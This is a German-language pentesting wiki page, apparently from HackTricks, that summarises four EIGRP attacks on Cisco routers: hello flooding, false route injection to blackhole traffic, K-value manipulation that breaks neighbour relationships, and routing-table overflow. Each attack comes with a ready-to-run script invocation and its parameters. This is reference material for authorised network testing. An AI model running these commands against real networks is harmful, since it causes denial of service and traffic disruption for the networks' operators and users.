EIGRP Attacks
Last updated
Last updated
Lernen Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Dies ist eine Zusammenfassung der Angriffe, die in https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 exponiert wurden. Überprüfen Sie sie für weitere Informationen.
Ziel: Überlastung der Router-CPUs durch Fluten mit EIGRP-Hello-Paketen, was potenziell zu einem Denial-of-Service (DoS)-Angriff führen kann.
Tool: helloflooding.py Skript.
Ausführung: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
Parameter:
--interface
: Gibt die Netzwerkschnittstelle an, z. B. eth0
.
--as
: Definiert die EIGRP-autonome Systemnummer, z. B. 1
.
--subnet
: Legt den Subnetzstandort fest, z. B. 10.10.100.0/24
.
Ziel: Unterbrechung des Netzwerkverkehrsflusses durch Einspeisen einer falschen Route, was zu einem Blackhole führt, wohin der Verkehr an ein nicht vorhandenes Ziel gerichtet wird.
Tool: routeinject.py Skript.
Ausführung: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
Parameter:
--interface
: Gibt die Netzwerkschnittstelle des Angreifers an.
--as
: Definiert die EIGRP-AS-Nummer.
--src
: Legt die IP-Adresse des Angreifers fest.
--dst
: Legt die Ziel-Subnetz-IP fest.
--prefix
: Definiert die Maske der Ziel-Subnetz-IP.
Ziel: Kontinuierliche Störungen und Wiederverbindungen im EIGRP-Domäne durch Einspritzen veränderter K-Werte zu erzeugen, was effektiv zu einem DoS-Angriff führt.
Tool: relationshipnightmare.py Skript.
Ausführung: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
Parameter:
--interface
: Gibt die Netzwerkschnittstelle an.
--as
: Definiert die EIGRP-AS-Nummer.
--src
: Legt die IP-Adresse eines legitimen Routers fest.
Ziel: Überlastung der Router-CPU und des RAMs durch Fluten der Routing-Tabelle mit zahlreichen falschen Routen.
Tool: routingtableoverflow.py Skript.
Ausführung: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
Parameter:
--interface
: Gibt die Netzwerkschnittstelle an.
--as
: Definiert die EIGRP-AS-Nummer.
--src
: Legt die IP-Adresse des Angreifers fest.
Lernen Sie AWS-Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen Sie GCP-Hacking: HackTricks Training GCP Red Team Expert (GRTE)